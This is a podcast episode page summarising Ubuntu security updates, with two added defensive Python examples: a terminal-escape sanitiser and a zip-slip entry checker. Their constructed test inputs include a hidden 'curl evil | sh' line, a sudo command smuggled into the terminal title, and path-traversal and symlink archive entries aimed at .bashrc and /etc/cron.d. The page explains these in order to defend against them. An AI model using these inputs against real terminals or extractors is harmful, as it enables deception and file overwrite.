Content provided by Alex Murray and Ubuntu Security Team. All podcast content, including episodes, graphics and podcast descriptions, is uploaded and provided directly by Alex Murray and Ubuntu Security Team or their podcast platform partner. If you believe someone is using your copyrighted work without your permission, you can follow the process outlined here: https://th.player.fm/legal
Episode 87
Overview
This week we look at the Drovorub Linux malware outed by the NSA/FBI plus we detail security updates for Dovecot, Apache, Salt, the Linux kernel and more.
This week in Ubuntu Security Updates
24 unique CVEs addressed
[USN-4456-1, USN-4456-2] Dovecot vulnerabilities [00:46]
- 3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- 3 DoS issues - deeply nested MIME parts -> resource exhaustion; CompuServe RPA auth mechanism (rarely used) -> zero-length message -> assertion failure; NTLM missing length check -> buffer over-read -> crash
[USN-4457-1, USN-4457-2] Software Properties vulnerability [01:39]
- 1 CVE addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- add-apt-repository printed the Launchpad PPA description without stripping ANSI escape sequences, so a malicious description could control what the user's terminal displays
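The Software Properties issue is a terminal escape injection: text fetched from a remote party is printed straight to a TTY, so the remote party gets to drive the terminal. The check below is an added example in Python (software-properties is written in Python), not the fix that shipped in USN-4457-1 and not code from the project; the hostile PPA description it works on is constructed for the demo. It strips ESC-introduced sequences (CSI, OSC and the rest), then any remaining control characters apart from TAB and newline, including the 8-bit C1 range that many terminals accept as one-byte aliases for ESC sequences.

```python
import re

# Constructed hostile PPA description (not a real PPA). Printed raw, it would
# clear the screen, paint a reassuring green line, set the terminal title to a
# command and use erase-to-end-of-line to hide the tail of the next line.
HOSTILE_DESCRIPTION = (
    "Handy backports \x1b[2J\x1b[H\x1b[32mVerified by Ubuntu Security\x1b[0m\n"
    "\x1b]0;sudo apt-get install --yes\x07Run: curl evil | sh\x1b[K\n"
    "\x9bNormal text\ttab kept"
)

# ESC-introduced sequences, matched the way a terminal parses them:
#   CSI    ESC [ <params 0x30-0x3F>* <intermediates 0x20-0x2F>* <final 0x40-0x7E>
#   OSC    ESC ] ... terminated by BEL or ST (ESC \); an unterminated OSC is
#          dropped up to the next ESC or the end of the text, as a terminal
#          would keep swallowing it
#   other  ESC <intermediates 0x20-0x2F>* <final 0x30-0x7E>, e.g. ESC c (reset)
_ESC_SEQ = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)?"
    r"|\x1b[ -/]*[0-~]"
)

# Remaining C0 controls except TAB (0x09) and LF (0x0A), DEL (0x7F), and the
# C1 range (0x80-0x9F); CR is included because it lets text overwrite a line.
_CONTROL = re.compile(r"[\x00-\x08\x0b-\x1f\x7f\x80-\x9f]")


def sanitize_for_terminal(text: str) -> str:
    """Remove every escape sequence and control character (other than TAB and
    LF) from untrusted text so that printing it cannot steer the terminal."""
    text = _ESC_SEQ.sub("", text)
    return _CONTROL.sub("", text)


def looks_tampered(text: str) -> bool:
    """True if the text carried terminal controls, i.e. sanitising changes it."""
    return sanitize_for_terminal(text) != text


if __name__ == "__main__":
    print("description carried terminal controls:", looks_tampered(HOSTILE_DESCRIPTION))
    # What the user should actually see: escapes gone, the real text visible.
    print(sanitize_for_terminal(HOSTILE_DESCRIPTION))
```

Stripping rather than escaping is the right default for a one-off display like a PPA description: the user sees exactly the words the publisher wrote, and the "Run: curl evil | sh" line that the raw version tried to erase stays visible. If the text must be shown verbatim for debugging, print `repr()` of it instead.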
[USN-4458-1] Apache HTTP Server vulnerabilities [02:27]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- mod_rewrite could be tricked into redirecting to an unexpected URL via newlines encoded into the request URL
- use of uninitialized memory when proxying to a malicious FTP server -> info leak
- 2 HTTP/2 issues - improper handling of Cache-Digest headers, and of certain logging statements -> crash, DoS
- buffer overflow in mod_proxy_uwsgi -> crash / possible code exec
[USN-4459-1] Salt vulnerabilities [03:18]
- 5 CVEs addressed in Xenial (16.04 LTS), Bionic (18.04 LTS)
- File enumeration on remote server -> info leak
- Authentication bypass
- Command injection from unauthenticated users -> code exec on salt-api host
- Failure to validate method calls and sanitise paths -> access control bypass
[USN-4460-1] Oniguruma vulnerabilities [03:58]
- 4 CVEs addressed in Trusty ESM (14.04 ESM)
- regex library used by PHP and Ruby -> various issues leading to DoS / info leak etc
[USN-4461-1] Ark vulnerability [04:20]
- 1 CVE addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
- KDE archive handler - a malicious ZIP could contain entries whose paths resolve outside the extraction directory (zip-slip), so extracting it writes files elsewhere on the system
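Zip-slip is a property of the entry names, so it can be checked before anything is written. The example below is added here and is not Ark's code or the KDE fix; it builds a small in-memory archive (constructed for the demo) that mixes benign entries with the usual tricks, and classifies each entry against an assumed destination of /srv/extract. The check is lexical, so the destination need not exist. It also refuses symlink entries and anything that would be written through one, since a link to /etc followed by `link/cron.d/evil` escapes the directory even though the name itself contains no `..`.

```python
import io
import posixpath
import stat
import zipfile


def _ancestors(norm_name):
    """Yield every proper prefix directory of a normalised entry name."""
    parts = norm_name.split("/")
    for i in range(1, len(parts)):
        yield "/".join(parts[:i])


def classify_members(zf, dest_dir):
    """Split a ZipFile's entries into those safe to write under dest_dir and
    those that would land (or point) outside it, with a reason for each
    rejection. dest_dir must be absolute; lexical check only."""
    if not dest_dir.startswith("/"):
        raise ValueError("dest_dir must be absolute")
    dest = posixpath.normpath(dest_dir)
    safe, rejected = [], []
    symlinks = set()  # normalised names of symlink entries seen so far
    for info in zf.infolist():
        name = info.filename
        # Rule 1: absolute entry names are never acceptable.
        if name.startswith("/"):
            rejected.append((name, "absolute path"))
            continue
        # Rule 2: after normalisation the target must still sit under dest.
        target = posixpath.normpath(posixpath.join(dest, name))
        if posixpath.commonpath([dest, target]) != dest:
            rejected.append((name, "escapes destination"))
            continue
        # Rule 3: symlink entries can point anywhere, so refuse them and
        # anything whose path runs through one.
        norm = posixpath.normpath(name)
        if stat.S_ISLNK(info.external_attr >> 16):
            symlinks.add(norm)
            rejected.append((name, "symlink entry"))
            continue
        if any(anc in symlinks for anc in _ancestors(norm)):
            rejected.append((name, "path passes through symlink entry"))
            continue
        safe.append(name)
    return safe, rejected


def build_sample_zip():
    """Constructed in-memory archive: benign entries plus the classic zip-slip
    tricks. Not a real-world sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign\n")
        zf.writestr("docs/../notes.txt", "normalises to notes.txt, still inside\n")
        zf.writestr("../../.bashrc", "overwrite a dotfile above dest\n")
        zf.writestr("/etc/cron.d/evil", "absolute path\n")
        zf.writestr("a/b/../../../../outside", "traversal hidden behind real dirs\n")
        link = zipfile.ZipInfo("link")
        link.create_system = 3                        # Unix attributes
        link.external_attr = (stat.S_IFLNK | 0o777) << 16
        zf.writestr(link, "/etc")                     # symlink: link -> /etc
        zf.writestr("link/cron.d/evil", "written through the symlink\n")
    buf.seek(0)
    return buf


def classify_sample(dest_dir="/srv/extract"):
    """Run the check over the constructed archive; returns (safe, rejected)."""
    with zipfile.ZipFile(build_sample_zip()) as zf:
        return classify_members(zf, dest_dir)


if __name__ == "__main__":
    safe, rejected = classify_sample()
    for name in safe:
        print("OK      ", name)
    for name, reason in rejected:
        print("REJECTED", name, "-", reason)
```

Python's own `ZipFile.extract()` already strips leading slashes and `..` components from entry names and never creates symlinks, so the symlink rule is there for extractors that do preserve links (tar-style extraction and native archive tools); a GUI archiver that honours Unix attributes is in that second group.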
[USN-4465-1] Linux kernel vulnerabilities [04:50]
- 3 CVEs addressed in Bionic (18.04 LTS)
- 5.3 (hwe)
- Memory leak in USB testing driver on disconnect - a physically present attacker could repeatedly plug / unplug a device and eventually exhaust memory
- bcache deadlock -> DoS
- Crafted XFS metadata could cause a sync of excessive duration -> DoS
[USN-4462-1] Linux kernel vulnerability [05:53]
- 1 CVE addressed in Bionic (18.04 LTS)
- 5.0 (gke / oem)
- bcache deadlock -> DoS
[USN-4463-1] Linux kernel vulnerabilities [06:06]
- 2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial (16.04 LTS)
- 4.4 (xenial / trusty esm hwe)
- bcache deadlock
- usb testing driver memory leak
[USN-4464-1] GNOME Shell vulnerability [06:24]
- 1 CVE addressed in Focal (20.04 LTS)
- Could display the login password on the logout screen if the user had made it visible when logging in
[USN-4466-1] curl vulnerability [06:53]
- 1 CVE addressed in Xenial (16.04 LTS), Bionic (18.04 LTS), Focal (20.04 LTS)
- libcurl - improper handling of the CURLOPT_CONNECT_ONLY option -> could connect to the wrong destination and so expose sensitive information
Goings on in Ubuntu Security Community
Joe and Alex discuss Drovorub Linux malware [07:24]
Get in contact